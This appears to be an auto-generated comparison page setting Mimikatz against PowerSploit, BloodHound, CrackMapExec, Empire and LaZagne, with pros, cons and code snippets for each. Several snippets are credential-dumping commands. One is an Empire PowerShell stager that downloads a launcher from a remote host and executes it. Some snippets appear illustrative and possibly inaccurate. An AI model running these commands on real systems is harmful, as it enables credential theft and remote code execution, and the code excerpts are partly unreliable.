Pros of Mimikatz (gentilkiwi)

• Original repository maintained by the creator, Benjamin Delpy
• More frequent updates and active development
• Larger community and broader support base

Cons of Mimikatz (gentilkiwi)

• May contain experimental features that are less stable
• Potentially higher risk of detection by antivirus software due to popularity

Code Comparison

Mimikatz (gentilkiwi):

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
	switch (ul_reason_for_call)
	{
		case DLL_PROCESS_ATTACH:
			kuhl_m_sekurlsa_utils_my_LdrEnumModulesCallback(hModule);
			break;
		case DLL_PROCESS_DETACH:
			break;
	}
	return TRUE;
}

Mimikatz (ParrotSec):

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
	switch (ul_reason_for_call)
	{
		case DLL_PROCESS_ATTACH:
			kuhl_m_sekurlsa_utils_my_LdrEnumModulesCallback(hModule);
			break;
		case DLL_PROCESS_DETACH:
			break;
	}
	return TRUE;
}

The code comparison shows identical DllMain functions in both repositories, indicating that the core functionality remains the same. The main differences between the two repositories lie in their maintenance, update frequency, and potential modifications made by ParrotSec for integration into their security distribution.

Pros of PowerSploit

• Written in PowerShell, making it more native to Windows environments
• Broader range of post-exploitation tools and modules
• Easier to integrate with other PowerShell-based tools and scripts

Cons of PowerSploit

• Less frequently updated compared to Mimikatz
• May be more easily detected by modern antivirus solutions
• Requires PowerShell execution, which might be restricted in some environments

Code Comparison

Mimikatz (C):

BOOL WINAPI kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, CONST VOID * pattern, SIZE_T szPattern, PVOID * ptr)
{
	BOOL found = FALSE;
	KULL_M_MEMORY_SEARCH sMemory = {{{pLib->address, pLib->address + pLib->size, PAGE_READWRITE}, NULL}, NULL};
	if(kull_m_memory_search(&sMemory, pattern, szPattern, cLsass->hLsassMem))
	{
		*ptr = sMemory.result;
		found = TRUE;
	}
	return found;
}

PowerSploit (PowerShell):

function Get-ProcessTokenGroup
{
    [CmdletBinding()] Param (
        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
        [Alias('ProcessID')]
        [UInt32]
        $ProcessId
    )

    $TokenGroupsPtr = [IntPtr]::Zero
    $ReturnLength = 0

Both repositories focus on post-exploitation techniques, but Mimikatz is more specialized in credential extraction, while PowerSploit offers a wider range of tools. Mimikatz is written in C, providing lower-level access and potentially better performance, while PowerSploit leverages PowerShell for easier integration in Windows environments.

Pros of BloodHound

• Provides a comprehensive visual representation of Active Directory environments
• Offers powerful path-finding capabilities for identifying attack vectors
• Integrates well with other security tools and frameworks

Cons of BloodHound

• Requires more setup and configuration compared to Mimikatz
• May generate significant network traffic during data collection
• Limited to Active Directory environments, while Mimikatz has broader application

Code Comparison

BloodHound (PowerShell data collection):

Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain CONTOSO.LOCAL -ZipFileName "bloodhound_data.zip"

Mimikatz (extracting credentials):

privilege::debug
sekurlsa::logonpasswords

BloodHound focuses on mapping and analyzing Active Directory relationships, while Mimikatz is primarily used for extracting credentials and performing various Windows security-related operations. BloodHound's code typically involves data collection and analysis, whereas Mimikatz directly interacts with Windows security mechanisms.

Both tools are valuable for security professionals and penetration testers, but they serve different purposes in the security assessment process. BloodHound excels at visualizing attack paths in AD environments, while Mimikatz is more versatile for credential extraction and manipulation across different Windows systems.

Pros of CrackMapExec

• More versatile tool for network reconnaissance and lateral movement
• Supports multiple protocols (SMB, WMI, MSSQL, etc.) for broader attack surface
• Active development with frequent updates and community contributions

Cons of CrackMapExec

• Requires more setup and dependencies compared to Mimikatz
• Less focused on credential extraction, which is Mimikatz's primary strength
• May be more complex to use for beginners due to its wider range of features

Code Comparison

Mimikatz (PowerShell):

Invoke-Mimikatz -DumpCreds

CrackMapExec (Python):

crackmapexec smb 192.168.1.0/24 -u username -p password --sam

While Mimikatz focuses on extracting credentials directly from memory, CrackMapExec provides a broader range of network enumeration and exploitation capabilities. Mimikatz is typically more straightforward for credential extraction, while CrackMapExec offers more flexibility for network-wide operations and lateral movement.

Both tools are valuable in penetration testing and security assessments, with Mimikatz excelling in credential extraction and CrackMapExec providing a more comprehensive toolkit for network exploitation. The choice between them depends on the specific requirements of the security assessment or penetration test being conducted.

Pros of Empire

• More comprehensive post-exploitation framework with multiple modules
• Cross-platform support (Windows, macOS, Linux)
• Active development and community support

Cons of Empire

• Larger footprint and potentially easier to detect
• Steeper learning curve due to more complex functionality
• Requires more setup and configuration

Code Comparison

Empire (PowerShell stager):

$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX $wc.DownloadString('http://empire.server/launcher');

Mimikatz (basic command execution):

int wmain(int argc, wchar_t * argv[])
{
    mimikatz_begin();
    mimikatz_process(argc, argv);
    mimikatz_end();
    return STATUS_SUCCESS;
}

While both tools are used for post-exploitation, Empire focuses on providing a full-featured framework for various tasks, whereas Mimikatz specializes in credential extraction and manipulation. Empire offers more flexibility and modules but requires more setup, while Mimikatz is more focused and easier to use for specific credential-related tasks.

Pros of LaZagne

• Cross-platform support (Windows, Linux, macOS)
• Modular architecture allows easy addition of new modules
• Retrieves a wider variety of credentials (browsers, email clients, Wi-Fi, etc.)

Cons of LaZagne

• Less focused on Windows authentication mechanisms
• May require more setup and dependencies
• Not as deeply integrated with Windows internals

Code Comparison

LaZagne (Python):

def run_lazagne(category_selected="all", subcategories={}, password=None):
    for category in category_selected:
        for module in get_categories()[category]:
            try:
                mod = import_module(module)
                pwd_found = mod.run(password)
                # Process and store results
            except Exception:
                pass

Mimikatz (C):

NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[])
{
    return kuhl_m_sekurlsa_acquireLSA(kuhl_m_sekurlsa_enum_logon_callback_msv, NULL);
}

LaZagne is more modular and extensible, while Mimikatz is more focused on Windows-specific authentication mechanisms and has deeper system integration.